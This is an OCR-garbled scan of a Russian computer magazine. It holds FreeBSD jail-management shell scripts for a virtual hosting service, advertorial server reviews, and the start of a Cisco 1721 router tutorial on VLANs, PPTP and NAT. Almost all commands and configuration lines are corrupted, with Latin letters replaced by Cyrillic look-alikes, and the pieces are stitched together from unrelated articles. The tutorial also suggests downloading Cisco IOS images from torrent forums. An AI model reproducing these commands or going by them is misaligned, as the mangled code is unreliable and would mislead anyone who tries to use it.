Скрипт принимает шесть аргументов (доменное имя виртуального сер- 
вера, версия ОС, е-таіі владельца, тип аккаунта, время истечения срока 
аренды, файл с публичным ключом клиента) и возвращает ІР нового 
сервера. 

Скрипт беіѵзегѵег выполняет обратную процедуру. Сначала он находит 
сервер в базе 6Ъ, проверяет, существует ли сервер вообще (статус не 
должен быть попе), а затем выполняет следующую последовательность 
действий (переменная 5ТВШС — это строка сервера из 6Ъ) : 

# ѵіт /изг/ІосаІ/Ьіп/сІеІѵБегѵег 

# Удаляем сервер 

6АІЬВІК= ' есбю $ЗТКІШ I сиб -б ' : ' -6 2' 
гш -Кб $ 6АІБВІК/ $ІР $ БАІБВІК/ $ { ІР) . ірбм 

# Удаляем сервер из базы ВИЗ 
НОЗТБАМЕ= 1 есбю $ЗТКШС I сиб -б ' : ' -6 4' 

БРКЕ0=$ БАІЬВАЗЕ/иргер 

есбю "ирбабе беіебе $НОЗТБАМЕ А" > $БРКЕ0 
есбю "зепб" » $БРКЕ() 

пзирбабе -к $ БАІЬВАЗЕ/Кпзирбабе . * . ргіѵабе $БРКЕ(2 
гш -б $БРКЕ0 

# Устанавливаем для сервера статус попе 
БЕМЗТКШС= ' есію $ЗТКШС I зеб " /$ЗТАТБЗ/з##попе# " ' 
зеб "/ Л $ІР. */з##$БЕМЗТКШС#" $БВ > $ {БВ} . пеѵг 

шѵ $ {БВ} . пем $БВ 

Скрипт бізаЫеѵзегѵег, предназначенный для временного отключения 
виртуального сервера, очень похож на беіѵзегѵег, с тем исключением, 
что он не удаляет сервер, а просто ставит на него флаг «бізаЫеб». То есть, 
переменная ЫЕѴѴ5ТКШС примет вид: «ЫЕЭДЗТКШО= ' есію $ ЗТКІЫО I 
зеб " /$ЗТАТбЗ/з##бізаЫеб# " '». 

Скрипт епаЫеѵзегѵег — брат-близнец бізаЫеѵзегѵег, единственное отли- 
чие которого — установка флага ’ок вместо 'бізаЫеб'. 

Скрипт зіаггѵзегѵег — довольно примитивен. Он ищет переданный ему 
ІР-адрес в базе, проверяет сервер на готовность (статус ' ок 1 ) и запускает 
его. Набор правил номер 4 (гиіезеі: 4) для команды беѵбз создан специ- 
ально для) аіі-окружений и содержится в файле /егс/бебаикз/беѵбз . гиіез . 
Чтобы скрипт работал корректно, этот файл необходимо положить в /еіс. 

# ѵіт /и5г/ІосаІ/Ьіп/5ІагІѵ5егѵег 

# Извлекаем данные, необходимые для запуска 
6АІЬБІК= 1 есбю $ЗТКІШ I сиб -б ' : ' -6 2' 

ІЕ= ' есбю $ЗТКІЫС I сиб -б ' : ' -6 3' 
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Пример заполненной базы серверов 



В списке процессов — пять только что запущенных серверов 
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шпоипб $ бАІЬВІК/$ІР/изг/рогбз/раскаде8 
итоипб $ бАІЬБІВ/$ІР/беѵ 
итоипб $бАІЬБІК/$ІР/ргос 
ібсопбід $ІР іпеб -аііаз $ІР 

Чтобы не заморачиваться с ручным запуском серверов, напишем скрипт 
ѵзегѵегз, который проверяет опцию ѵ5егѵег5_епаЫе в /еіс/гс.сопб, запуска- 
ет все готовые виртуальные серверы во время загрузки ОС и останавлива- 
ет во время шатдауна. Ключевые строки этого файла: 

# ѵіт /изг/ІосаІ/еІс/гс.сІ/ѵзегѵегБ 

# Получаем список работоспособных серверов 
Ѵ8ЕКѴЕК8= ' саб /изг/з аіІЪазе/бЪ I дгер -е 1 : ок$ ' | сиб -б 

' : ' -б !' 
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* Процедура С'хчлно'яин серяероп 

ѵнгѵігі..*»рО 

і 

Тот ТР Іи ІУіейѵСВБ-З 4й 



Скрипт /изг/іосаі/еіс/гс.сі/ѵзегѵегз 



Н08ТЫАМЕ= ' есбю $5ТКІШ I сиб -б ' : ' -6 4' 

03ѴЕК= 1 есбю $ЗТКІШ I сиб -б ' : 1 -6 5' 

# Запускаем заіі-сервер 

ібсопбід $ІР іпеб аііаз $ІР 

шоипб -б беѵбз попе $ 6АІЫЭІК/ $ІР/беѵ 

беѵбз -ш $бАІЬБІК/$ІР/беѵ гиіезеб 4 

шоипб -б ргоебз попе $бАІЫ)ІК/$ІР/ргос 

шоипб_пи116з $ бАІЬВА8Е/бізб6і1ез-$08ѴЕК 

$бАІЬБІК/$ІР/изг/рогбз/бізб6і1ез 

шоипб_пи1 1 6 з $ бАІЬВАЗЕ /раскадез - $05ѴЕК 

$ПАІЬБІК/$ІР/изг/рогбз/раскадез 

3 аіі $ бАІЬВІК/ $ІР $Н03ТЫАМЕ $ІР /Ып/зЬ /ебс/гс 

Скрипт зіорѵзегѵег перед остановкой проделывает те же шаги и, плюс к 
этому, проверяет, запущен ли сервер с помощью команды фз — и извлека- 
ет его ЛЮ (первая колонка вывода Дз) : 



# Процедура запуска серверов 
ѵзегѵегз_збагб ( ) 

{ 

бог ІР іп $Ѵ8ЕКѴЕК8; бо 

/изг/1оса1/Ьіп/збагбѵзегѵег $ІР 

бопе 

} 

# Процедура остановки серверов 
ѵзегѵегз_збор ( ) 

{ 

бог ІР іп $Ѵ8ЕКѴЕКЗ; бо 

/изг/ІосаІ/Ьіп/зборѵзегѵег $ІР 

бопе 

} 

Вот и все. Рассмотренные скрипты автоматизируют всю грязную работу. 
Больше не нужно компилировать окружение исполнения, добавлять 
ІР-псевдонимы и редактировать файлы зон! Достаточно выполнить всего 
две команды, — и виртуальный сервер создан, запущен и полностью готов 
к использованию : 

# ІР= 1 аббѵзегѵег пем.бюзб . сот 7.1-КЕЬЕАЗЕ ѵазуа@таі1 . ги 
базе 0906061200 /публичный/ключ/Васи 1 

# збагбѵзегѵег $ІР 

Остановить и удалить сервер еще проще: 



# ѵіт /изг/ІосаІ/Ьіп/зІорѵзегѵег 

# Проверяем, запущен ли сервер 
8ТПІЫС='з1з I дгер $ІР' 

іб [ I "$ЗТКШС" ]; ббеп 

есбю "Сервер $ІР не запущен» 
ехіб 3 
бі 

# Узнаем ^іб сервера 

ЛБ= ’ есбю $ЗТЕШС I сиб -б ' 1 -6 1’ 

# Останавливаем ^аі1-сервер 
кіііаіі ~з $ЛБ -ТЕВМ > /беѵ/пиіі 2>&1 
зіеер 1 

кіііаіі -д $ Л Б -КІЬЬ > /беѵ/пиіі 2>&1 
ишоипб $ПАІЬБІК/$ІР/изг/рогбз/бізббі1ез 



# зборѵзегѵег $ІР 

# беіѵзегѵег $ІР 

Осталось только нанять веб-разработчиков, которые создали бы поверх 
этого хозяйства простой интерфейс для регистрации пользователей, и 
написать небольшой скрипт, который запускался бы по крону и проверял, 
не истекли срок аренды аккаунта (пример скрипта ты найдешь на диске) . 

КАРКАС СОЗДАН Мы создали вполне работоспособный каркас 
будущего сервиса. В следующей статье мы рассмотрим, как прикрутить 
к нему полноценный мониторинг, настройки для разных типов аккаун- 
тов, систему бэкапа, наложим всевозможные ограничения и создадим 
гетерогенную систему, в которой смогут сосуществовать разные версии 
РгееВЗБ-окружений. тг 
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Экономичный и производительный сервер 








Технические характеристики 

> Процессор 

Іпіеі РепЕи т сі иа 1-соге Е2200/ Е5200 или 
Іпіеі Соге 2 Эио Е7200/Е8400 

> Память 

до 8 Гб двухканальной памяти ЭЭР2-800 

> Дисковые отсеки 

8 отсеков под 5.25" устройства 

> Поддержка РАШ 

Интегрированный 5АТА РАЮ-контроллер Ігбеі 
ІСН9Р (РАЮ 0,1 ,5,10], поддерживающий до 6 
жестких дисков 

> Сетевой интерфейс 

2-портовый интегрированный ОідаЬИ; ЕЕзегпеІ: 

1 0/1 00/1 000 Мбит (Іп1:еІ 82573] 

> Питание 

Блок питания мощностью 700 Вт или сдво- 
енный блок питания на 500 Вт (2x500 Вт] с 
избыточностью и возможностью горячей 
замены 

> Исполнение 
Отдельно стоящая башня 

Размеры (ДВШ, мм) — 591*430*221 , с ножка- 
ми 591*449*330, брутто 695*355*545 
Масса — до 25 кг 

Дополнительно может поставляться комп- 
лект для монтажа в 19" стойку. Рельсы имеют 
длину 500 мм. Высота сервера в стойке 
составляет 5Б 



Сервер БЕРО Зіюгт 115СЖ5, созданный специа- 
листами компании БЕРО СотриГегз, рассчитан в 
первую очередь на применение в сфере малого и 
среднего бизнеса. Это недорогой, но производи- 
тельный сервер, выполненный в форм-факторе 
Ребезііаі, высотой 45 сантиметров, который в ми- 
нимальной конфигурации можно использовать 
в качестве внутрисетевого БН5-, ЭНСР-, прок- 
си-сервера, брандмауэра и шлюза для офиса не- 
большой компании. Установка опционального 
КАЮ-контроллера на 4 или 8 дисков превратит 
его в надежный файл-сервер или сервер ѵѵеЪ-хос- 
тинга. 

По умолчанию сервер оснащен программно-ап- 
паратным 5АТА КАЮ-контроллером ІпГеІ ІСН9К. 
Он поддерживает до шести дисков, но работает 
только в паре с драйвером операционной систе- 
мы и не обеспечивает надежности, сравнимой с 
полностью аппаратными КАШ-контроллерами. 



К счастью, это не проблема, потому как дополни- 
тельно сервер может быть укомплектован и ап- 
паратными 5А5/5АТА КАЮ-контроллерами Ь5І 
Ьо§іс или АбарГес на 4 или 8 портов на выбор (для 
последнего также доступна батарея аварийного 
питания кэш-памяти). Количество и объем дис- 
ков можно подобрать индивидуально — вместе с 
корзиной «горячей замены» на 5 дисков. 
Материнская плата построена на чипсете Іпіеі 
3200 с интегрированным 2-портовым сетевым 
контроллером Ішеі 825 73Ѵ + 825660М и видеоа- 
даптером ХСІ 295 16 Мб. Объем предустановлен- 
ной оперативной памяти варьируется от одного 
до (максимум) восьми гигабайт двухканальной 
ЭЭК2-800. В стандартной комплектации сервер 
оснащен приводами ЭѴБ-КОМ и ЕББ, отустанов- 
ки которых, впрочем, можно отказаться. Особен- 
но радует опциональный сдвоенный блок пита- 
ния, общей мощностью 1000 Вт и возможностью 



«горячей замены», а также комплект для монта- 
жа в стойку 19". 

Сервер поставляется с документацией на рус- 
ском языке и полным набором необходимых 
драйверов. За дополнительную плату специа- 
листы ЭЕРО СотриГегз установят на сервер М5 
ѴѴіпбоѵѵз 2008 Згапбагб и набор ПО, из которого 
можно выбрать М5 ЗЬагеРоіпГ Зегѵісез 3.0 и М5 
Нурег-Ѵ. 

Конфигурация сервера очень гибка. На сайте 
компании имеется удобный конфигуратор, ко- 
торый позволит подобрать множество допол- 
нительных компонентов сервера и отказаться 
от ненужных предустановок. Цена сервера 
в стандартной конфигурации, включающей 
процессор Іщеі Репгіит биаі-соге Е5200, 1 Гб 
оперативной памяти, жесткий диск на 250 Гб 
и блок питания на 700 Вт, составляет 33578 
рублей. □с 
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ІВМ 5у5іет Х 3 2 50 М2: 

доступный и надежный 111-сервер 





Технические характеристики ІВМ 
5уз(етх3250М2: 

> Процессор (один из): 

ІпІеІХеоп 3360 (четырехъядерный] (2,83 ГГц, 
1333 МГц Р5В, 12 Мб] 

ІпІеІХеоп 3120 (двухъядерный] (3,1 6 ГГц, 

1 333 МГц Е5В, 6 Мб] 

ІпГеІ Соге 2 Эио Е7200 (2,53 ГГц, 1066 МГц 
Е5В,3 Мб) 

ІпГеІ Сеіегоп (2 ГГц, 800 МГц Е5В, 512 Кб) 

> Память: 

до 8 Гб двухканальной оперативной памяти 
ООР2-667/800 

> Дисковые отсеки: 

Два 3,5-дюймовых диска с возможностью 
обычной замены и интерфейсом 5АТА, два 
3,5-дюймовых диска 5С5І (5А5]/5АТА, либо 
четыре 2,5-дюймовых диска 5А5 с возмож- 
ностью горячей замены 



> Поддержка КАШ: 

Интегрированный аппаратный РАЮ-0, -1 в 
стандартной комплектации, дополнительно 
РАЮ-5 

> Сетевой интерфейс: 

Два адаптера ВідаЬіІ Еібегпеі (ВЬЕ) 

> Питание: 

Блок питания мощностью 350 Вт 

> Расширение: 

1 слот РСІ Ехргезз х8 
1 слот РСІ Ехргезз х4 

> Внешние порты ввода-вывода 

4 разъема 115В 2.0 (2 спереди, 2 сзади) 

1 выход Ѵ6А (Э-Биб) 

2 последовательных порта (ЭВ-9М) 

Разъемы Р5/2для подключения мыши и 
клавиатуры 



> Другое: 

ІРМІ 2.0-совместимый тіпі-ВМС2, дополни- 
тельно Р5А II ЗІітЫпе 
Интегрированный видеоадаптер АТІ Е51000 
32 Мб 

Привод ВѴБ+/-РѴѴ 

> Система охлаждения: 

Технология Саіібгаііесі Ѵесіюгесі Сооііпд (СѴС) 

> Исполнение: 

Установка в стойку/1 И, 22" в глубину 

> Гарантийное обслуживание: 

Ограниченная гарантия на 1 или 3 года на 
заменяемые заказчиком модули с обслужи- 
ванием на месте эксплуатации 



ІВМ Зузіет х3250 М2 позиционируется как сер- 
вер, оптимально подходящий для поддержки 
сетевой инфраструктуры небольших компаний 
и отделов. И, надо сказать, это правда. Низкий 
уровень шума и энергопотребления, малый раз- 
мер, хорошая производительность и поддержка 
КАШ О, -1 вкупе с невысокой ценой (от 36800 
рублей — зависит от конфигурации) делают его 
очень привлекательным в качестве надежного 
почтового или ѵѵеЬ-сервера, контроллера доме- 
на Асгіѵе ЭігесГогу, балансировщика нагрузки, 
ЭН5-, ЭНСР-, прокси-сервера или брандмауэра. 
Вычислительная мощность сервера может быть 
индивидуально подобрана под задачу. Даже в ми- 
нимальной конфигурации с процессором ІпГеІ 
Сеіегоп на 2 ГГц и одним гигабайтом оператив- 
ной памяти производительности будет вполне 



достаточно для работы сетевых сервисов неболь- 
шой компании. В качестве хранилища данных 
могут быть использованы пара 3,5-дюймовых 
жесткихдисков 5АТА, параЗ,5-дюймовыхдисков 
5А5/5АТА или четыре 2, 5 -дюймовых диска 5А5. 
Причем, последние два варианта предполагают 
возможность горячей замены не только без ос- 
тановки сервера, но и без извлечения из стойки. 
Встроенный КАШ-контроллер поддерживает 
конфигурацию КАШ-0, -1, но для получения 
поддержки КАШ-5 придется установить допол- 
нительный адаптер РСІ-Ехргезз. Сервер выпол- 
нен в форм-факторе Ш для установки в стойку, 
благодаря чему он отлично подходит для расши- 
рения существующей сетевой инфраструктуры. 
Технология СаІіЪгаГеб ѴесГогесІ Соо1іп§ (СѴС) оп- 
тимизирует путь прохождения воздушного пото- 



ка, регулируя скорости вращения вентиляторов 
в зависимости от внутренних температур. Это 
позволяет снизить шумовые показатели и расход 
электроэнергии. Особо отметим наличие встро- 
енного управляющего мини-контроллера тіпі- 
ВМС2, совместимого со спецификацией ІРМІ 
2.0 (интеллектуальный интерфейс управления 
платформой). Кроме основных функций, тіпі- 
ВСМ2 также позволяет управлять и следить за 
состоянием КАШ-контроллера. Дополнительно 
можно приобрести адаптер для удаленного уп- 
равления К5А II ЗНтІлпе (еп.шікіребіа.огчАѵікі/ 
ІВМ КетоГе Зирегѵізог АбарГег) . Среди офици- 
ально поддерживаемых операционных систем 
числятся М5 ѴѴіпбоѵѵз 2003, ІМоѵеІІ ИеГѴѴаге 6.5 и 
Ііпих-дистрибутивы Кеб Наг Епіегргізе Ііпих К5 и 
51І5Е Ііпих Епгегргізе Зегѵег 10. т 
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Думаешь, что работать с сетевым оборудованием Сізсо Зузіетз могут 
только бородатые дядьки с сертификатами не ниже ССІЕ? Постара- 
юсьтебя в этом переубедить. 



В НАШЕ ВРЕМЯ ТОЛЬКО ЛЕНИВЫЙ ИЛИ 
ДАЛЕКИЙ ОТ КОМПЬЮТЕРОВ НЕ СЛЫ- 
ШАЛ О СІ5С0. Эта компания довольно давно 
работает в сфере информационных техноло- 
гий и разрабатывает сетевое оборудование, 
которое позволяет решить практически все 
возникающие задачи. Как ты понимаешь, 
стоят такие девайсы не $ 10, а намного дороже. 
Поэтому я советую сначала потренировать- 
ся на эмуляторах (Хепотірз, СЫ53, Возоп 
Коійег Зітиіагог), и только потом переходить 
к реальным системам. А если тебе не тер- 
пится повертеть в руках железку от Сізсо, то 
можешь походить по различным барахолкам 
и приобрести оборудование там. Именно так 
я и поступил, купив маршрутизатор Сізсо 1721 
и модуль расширения ѴѴІС-4Е5ѴѴ (свитч на 4 
порта) за 10к деревянных. Вполне нормально, 
если сравнивать с ценами в магазинах (там бы 
с меня содрали еще тысяч 20, как минимум) . 
Думаю, ты сам разберешься, какую модель 
прикупить, а я пока расскажу про используемое 
программное обеспечение. 

СІ5С0 105 105 (ІпГегпеПѵогк Орегагіоп ЗузГет, 
межсетевая операционная система) уста- 
навливается на сетевое оборудование Сізсо и 
предоставляет возможность гибкой настройки 
системы. По-хорошему, 105 нужно покупать, но 
если ты ограничен в средствах, можешь поис- 
кать нужный 105-образ на форумах (например, 
Гоггешз . ш Логшп) . Версию операционки подби- 
рай под конкретные задачи. Допустим, имидж 
105 называется так: с1700-ірЪазек9-пі2.124-12. 
Ьіп (на моей циске установлен именно он) . В 
данном случае: 

• СІ700 означает, что 105 предназначен для 
оборудования 17-й серии; 

• ірЬазек9 — набор возможностей; ірЬазе 
расшифровывается как начальный уровень 
функциональности, обеспечивает базовый роу- 
тинг, то есть статические маршруты, ШР, 05РР, 



ЕЮКР, только на ІРѵ4, включает ПАТ иѴЬАМ'ы 
(802. ^ и І5Ь) ; к9 — поддержка шифрования; 

• гиг показывает, что файл является бинарным 
(для сжатых используется наг) ; 

• 124-12 — номер релиза. 

Для выбора подходящего Ю5'а используется 
утилита ЕеаШге №ѵі§аГог. Находится она на 
официальном сайте Сізсо: нооіз.сізсо.сот/ 
ІТРІТ /СЕЫ /і зр /іпбех.і з] . Искать подходящий 
105 можно по набору возможностей, по исполь- 
зуемой платформе, а также по названию обра- 
за. Чтобы посмотреть, какой у тебя установлен 
105, достаточно набрать в консоли: 

сізсо# зЪ.сж ѵегзіоп 

Эта команда выдаст полную информацию о 
твоей циске — количество памяти, аптайм, 
модель процессора, доступные интерфейсы, 
значение конфигурационного регистра. 

ПОСТАНОВ КА 3 А ДАЧ И В начальных услови- 
ях у нас есть два провайдера: первый предостав- 
ляет доступ в интернет через локальную сеть с 
серым (читай: приватным) ІР, второй выдает 
белый ІР, но только после установления соеди- 
нения с РРТР-сервером. Также у нас имеется 
две локальных сети с адресами 192.168.1.0/24 
и 192.168.3.0/24. Адрес демилитаризованной 
зоны (ЭМ2) — 10.10.20.0/24. Формулируем 
задачи: 

1 . Сізсо должна устанавливать соединение с 
РРТР-сервером. 

2. Локальные сети должны выходить в интернет 
через первого провайдера (выделяет серый ІР) . 

3. Все запросы на внешний ІР должны перена- 
правляться в ЭМ2 на соответствующие сервера. 

4. Для локальных сетей циска должна высту- 
пать в роли ЭЫ5 и ЭНСР серверов. 

П ОД КЛ ЮЧ Е Н И Е К ЦИСКЕ Я предпочитаю на 
страивать сетевое оборудование через консоль, 



дабы при неполадках в сети оставалась воз- 
можность продолжения настройки. Итак, один 
конец консольного провода цепляем к циске, 
другой конец — к компу, используя СОМ-порт. 
Чтобы подключиться к девайсу, запускаем лю- 
бую терминальную программу и соединяемся с 
СОМ-портом на скорости 9600. Как вариант, — 
можешь использовать НурегТегтіпаІ, который 
включен в состав ѴѴіпбоѵѵз. После подключения 
жмем <Етег> и входим в привилегированный 
режим командой «епаЫе». В данный момент 
можно посмотреть состояние различных счет- 
чиков, текущую и стартовую конфигурацию, а 
также произвести поиск неисправностей в сети 
(я имею в виду ріп§, ггасегоиге) . Дія перехода 
в режим конфигурации необходимо ввести 
команду «сопй^иге Гегтіпаі». Именно в этом 
режиме мы и будем производить всю дальней- 
шую настройку. 

ПОДКЛЮЧЕНИЕ СЕТЕЙ Впринципе, здесь 
ничего сложного — подключаем витую пару в 
циску и присваиваем ІР-адреса интерфейсам. 
Все бы хорошо, но порты модуля ѴѴІС-4Е5ѴѴ 
— это зѵѵіісй-порты, то есть на них нельзя 
выставить ІР-адрес (Ь2 зѵѵйсЫп^). Решение 
сводится к добавлению физических портов в 
определенные ѴЬАИ'ы. Для тех, кто не в курсе: 
ѴЬАИ — это виртуальная локальная вычис- 
лительная сеть, отличие которой от обычной 
сети состоит в том, что отделяется она от 
других сетей не физически (установка нового 
оборудования), алогически (на управляемом 
коммутаторе ставится соответствие между его 
портами и определенными ѴЬАІЧ) . Другими 
словами, для решения нашей проблемы нам 
необходимо создать четыре виртуальные сети, 
присвоить им ІР-адреса и сказать циске, что 
этот порт принадлежит этой сети, а этот — той. 
Чтобы не занимать драгоценное журнальное 
место и не повторяться, приведу пример только 
для одной сети: 
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сізсо#ѵ1ап бабаЪазе 
сізсо (ѵіап) #ѵ1ап 2 
ѴЬАН 2 аббеб: 

Ыагпе: ѴЬАЫ00 02 
сізсо (ѵіап) #ех 

Теперь настроим наш ѵіап-интерфейс: 

сізсо#сопі б 
! Настраиваем ѵіап 2 
сізсо (сопбід) #іпб ѵіап 2 
! Выставляем ІР адрес 
сізсо (сопбід-іб) #ір-ас!с1гезз 
192.168.1.254 255.255.255.0 
сізсо (сопбід-іб) # Л 2 

Последнее, что необходимо сделать — доба- 
вить физический интерфейс в нужный нам 
ѵіап: 

! Конфигурируем интерфейс 

базбебЬегпеб 4 

сізсо (сопбід) #іпб ба4 

! Тип порта (может быть еще бгипк) 

сізсо (сопбід-іб) #зчлібс1ірогб тобе 

ассезз 

! Добавляем этот порт во второй ѵіап 
сізсо (сопбід-іб) #з\ѵібскрогб ассезз 
ѵіап 2 

Посмотрим, что получилось: 

сізсо#зй ір іпб Ъгіеб ѵіап 2 
Іпбегбасе* ІР-Аббгезз «ОК? «Меббюб* 86 
абиз • Ргобосоі 



Ѵіап2 «192.168.1. 2 54 «УЕ8 «шапиаі «ир 
• ир 

сізсо#зЪ. ір іпб Ъгіеб ба4 
Іпбегбасе* ІР-Аббгезз «ОК? «Меббюб* 
Збабиз • Ргобосоі 
РазбЕ61іегпеб4 «ипаззідпеб«УЕ8 • 
ипзеб «ир«ир 
сізсо#зЬ. ѵіап-зтлібсбі. 

ѴЫШ Ыаше Збабиз Рогбз 



1 бебаиіб асбіѵе 

2 ѴЪ АЫ 0002 асбіѵе Еа4 

. . . зкірреб . . . 

Можешь попробовать пропинговать кого- 
нибудь. Должно получиться. В качестве 
упражнения советую подключить остальные 
сети по аналогии с тем, как мы только что 
сделали. Советую также добавлять описание 
к интерфейсу с помощью команды безсгіргіоп, 
которую необходимо вводить в режиме кон- 
фигурирования интерфейса. Это необязатель- 
ная процедура, но через некоторое время без 
таких пометок будет сложно разобраться, что 
к чему относится . 

СОЕДИНЕНИЕ С РРТР-СЕРВЕРОМ Когда 
я покупал циску, то полагал, что установить 
соединение с ѴРП-сервером по протоколу 
РРТР — простая задача. Наделе оказалось, что 
девайс умеет соединяться только по протоколу 
Б2ТР. Прогуглив этот вопрос, я нашел решение, 
которое мне кажется больше хаком, чем 
документированной возможностью. Нижес- 
ледующая команда не появляется по нажатию 



«?>>, и ее нужно ввести вручную. Благодаря этой 
команде, при выборе протокола подключения 
можно выбрать протокол РРТР. 

сізсо (сопбід) #зегѵісе іпбегпаі 

Включаем и настраиваем ѵрбп (Ѵігшаі Ргіѵаге 
Біаіир НеЪлгогк) : 

! Включаем ѵрбп 
сізсо (сопбід) #ѵрбп епаЫе 
! Создаем группу с номером 1 
сізсо (сопбід) #ѵрбп-дгоир 1 
сізсо (сопбід-ѵрбп) #гедиезб-біа1іп 
! Указываем протокол соединения 
сізсо (сопіід-ѵрбп-гещ-іп) #ргобосо1 
ррбр 

сізсо ( сопбід-ѵрбп-гед-іп) #гобагу- 
дгоир 0 

! Указываем ѴРЫ сервер 

сізсо (сопбід-ѵрбп) #іпібіабе-бо ір _ѵрп_ 

зегѵег_ір_ 

Понятное дело, что вместо «_ѵрп_5егѵег_ір_» 
необходимо подставить ІР-адрес своего ѴР11- 
сервера. Теперь создаем сам интерфейс, на 
котором укажем параметры соединения: 

! Настраиваем интерфейс ѴРЫ-клиента 
сізсо (сопбід) #іпбегбасе БіаІегО 
! Указываем тби 
сізсо (сопбід-іб) #тби 1440 
! Автоматически получать ІР-адрес 
сізсо (сопбід-іб) #ір аббгезз 
педобіабеб 
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Официальная документация от Сізсо Бузіетз 





> іпіо 

• Сізсо 105 — мно- 
гозадачная опера- 
ционная система, 
выполняющая 
функции сетевой ор- 
ганизации, маршру- 
тизации, коммутации 
и передачи данных. 

• СІ_І — интерфейс 
командной строки 
Сізсо 105. 

• Оупатірз — програм- 
мный эмулятор марш- 
рутизаторов Сізсо. 
Позволяет эмулиро- 
вать а п па ратную часть 
маршрутизаторов, не- 
посредственно загру- 
жая и взаимодействуя 
с реальными образами 
Сізсо 105. Работает на 
ѴѴіпсІоѵѵз, большинстве 
І_іпих-систем,атакже 
на Мас05Х. 

• Подробнее о 
ѴІ_АІ\Гах и созда- 
нии виртуальной 
локальной сети читай 
в статье «Шаманство 
над вилланами», 
опубликованной в 
январском номере 
□С за 2009 год. 
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! Благодаря данной команде наш интерфейс будет 

всегда в состоянии "ир" 

сізсо (сопбід-іб) #ір ріш бепзе-тобе 

! Выставляем инкапсуляцию ррр 

сізсо (сопбід-іб) #епсарзи1абіоп ррр 

сізсо (сопбід-іб) #<5іа1ег іп-Ъапб 

сізсо (сопбід-іб) #<5іа1ег ісііе-бітеоиб 0 

сізсо (сопбід-іб) #біа1ег збгіпд 123 

сізсо (сопбід-іб) #біаіег ѵрбп 

! Номер сііаіег-іізб 1 а — для просмотра подходя- 
щих данных 

сізсо (сопбід-іб) #біаіег-дгоир 1 

! Отрубаем поддержку сізсо бізсоѵегу ргобосоі 

на этом интерфейсе 

сізсо (сопбід-іб) #по сбр епаЫе 

! Указываем логин и пароль для аутентификации 

сізсо (сопбід-іб) #ррр сйар бюзбпате _1одіп_ 

сізсо (сопбід-іб) #ррр сйар раззчлгогсі 0 _ 

раззѵ\гогсі_ 

И добавляем сііаіег-іізі:, где будут задаваться типы данных (в 
нашем случае — весь протокол ІР), которые будут застав- 
лять циску устанавливать соединение: 

сізсо (сопбід) #сііа1ег-1ізб 1 ргобосоі ір регтіб 

Вот вроде бы и все. Теперь соединение с ѴРЫ-сервером 
должно пройти нормально. Проверяем: 

сізсо#зЬ ір іпб сЗіаІО 

Іпбегбасе • ІР-АсИгезз «ОК? «Меббюсі» Збабиз • Ргобосоі 
БіаіегО »ххх. ххх. ххх. ххх «УЕЗ* ІРСР»ир«ир 

Соединение успешно установлено! Переходим к самому 
интересному — выпуск пользователей в интернет. 

НАТИМ ПОЛЬЗОВАТЕЛЕЙ Как сказано в техзадании, нам 
необходимо выпускать пользователей в интернет через пер- 
вого провайдера, а второго оставить только для внешних 
сервисов. Самым простым будет установить дефолтный 
маршрут на первого провайдера и ЫАТ'ить все пакеты. 





Вывод команды «зЬоѵѵ ѵегзіоп» — полная информация 
о роутере 



идущие из наших сетей. Так и поступим: 

сізсо (сопбід) #ір гоиРе 0.0. 0.0 0.0. 0.0 ІЗР1_СШ 

Маршрут добавили. Теперь создаем Ассезз ЬізЬ Он будет 
ловить необходимые нам пакеты, для которых нужно делать 
ЫАТ. Прошу заметить, что в данных правилах используется 
не обычная маска, а инвертная: 

! Создаем ассезз-іізб номер 1 
сізсо (сопбід) #ассезз-1ізб 1 регтіб 

192.168.1.0 0.0.0.255 

сізсо (сопбід) #ассезз-1ізб 1 регтіб 

192.168.3.0 0.0.0.255 

Введенный АСЬ не применяется на интерфейсе для разгра- 
ничения доступа, и правила регтй и бепу следует пони- 
мать не как «разрешить» или «запретить», а как просмотр 
подходящих (регтп) и неподходящих (бепу) пакетов. При 
написании ЫАТ-правил нам придется указать адреса источ- 
ников, которые необходимо будет заменить. Именно для 
этих целей нам пригодится наш АСЬ. В итоге, схема выгля- 
дит так: адрес источника будет модифицироваться только в 
тех пакетах, которые подошли под этот АСЬ. 

! Указываем в качестве исходных адресов 
ассезз-іізб 1 

сізсо (сопбід) #ір паб іпзібе зоигсе Іізб 1 
іпбегбасе Ѵіап4 оѵегіоаб 

Здесь мы меняем адреса на адрес интерфейса ѵіап 4. В 
завершающей стадии нам нужно указать, какие интерфейсы 
являются внутренними, а какие — внешними. Делается это с 
помощью команд «ір паі: іпзісіе» и «ір паг ошзісіе» соответствен- 
но. Команды вводятся при конфигурировании интерфейса: 

сізсо (сопбід) #іпб ѵіап 2 
сізсо (сопбід-іб) #ір паб іпзібе 
сізсо (сопбід-іб) #іпб ѵіап 4 
сізсо (сопбід-іб) #ір паб оибзібе 
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ѴЬМІ ЫаісіР 



Рогъз 



Зъаъиз 



1 


сіеіЁаиІЪ 






ас с. іѵе 






2 


ѴЬАЖЮ02 






ас Ъ іѵе 


Га4 




3 


ѴЬІШОООЗ 






ас і: іѵе 


ГаЗ 




4 


ѴЬАИ0004 






ас ъ іѵе 


Гаі 




5 


ѴЬАЫОООБ 






асъ іѵе 


Га2 




8 


ѴЬІШОООв 






асъ іѵе 






1002 


іЕсісіі-сіеіЁаиІъ 






ас і: іѵе 






1003 


ъокеп-гіпд-гіеіаиіъ 




ас ъ іѵе 






1004 


± сісі і пе і:. - сіе ± аи 1 Ъ 






асъ іѵе 






1005 


Ъг: пеЪ-гіе:ЁаиІЪ 






асъ іѵе 






ѴЬМІ 


Туре ЗАІС 


НТІТ 


Рагепъ 


РіпдИо ЕъійдеЫо 5Ър 


ЕъйдИойе 


1 


епеъ 10О001 


1500 


- 


- - 


- 


- 


2 


епеЪ 100О02 


1500 


- 


- 


- 


- 


3 


епеъ 100О03 


1500 


- 


- 


- 


- 


4 


епеъ 100О04 


1500 


- 


- 


- 


- 


5 


епеъ 100О05 


1500 


- 


- 


- 


- 



В процессе настройки ѴЬАЫ 



ЛПІХ] 

В і. 






. ; 



Тгапзі Тгапз2 



1002 1003 

□ □ 

□ О 

□ О 

□ □ 





Сізсо 1721. Вид спереди 



Сізсо 1721. Вид сзади. Справа находится модуль ѴѴІС-4Е5ѴѴ, слева — 
Бегіаі порт и по центру — Сопзоіе 



В этом случае ѵ1ап2 является внутренней сетью, а ѵ1ап4 — внешней. 

ИСПОЛЬЗУЕМ ВНЕШНИЕ РЕСУРСЫ Следующим шагом будет перена- 
правление всех данных от внешних клиентов к внутренним серверам. Не 
станем сразу переходить к настройке, а сначала разберемся, как это долж- 
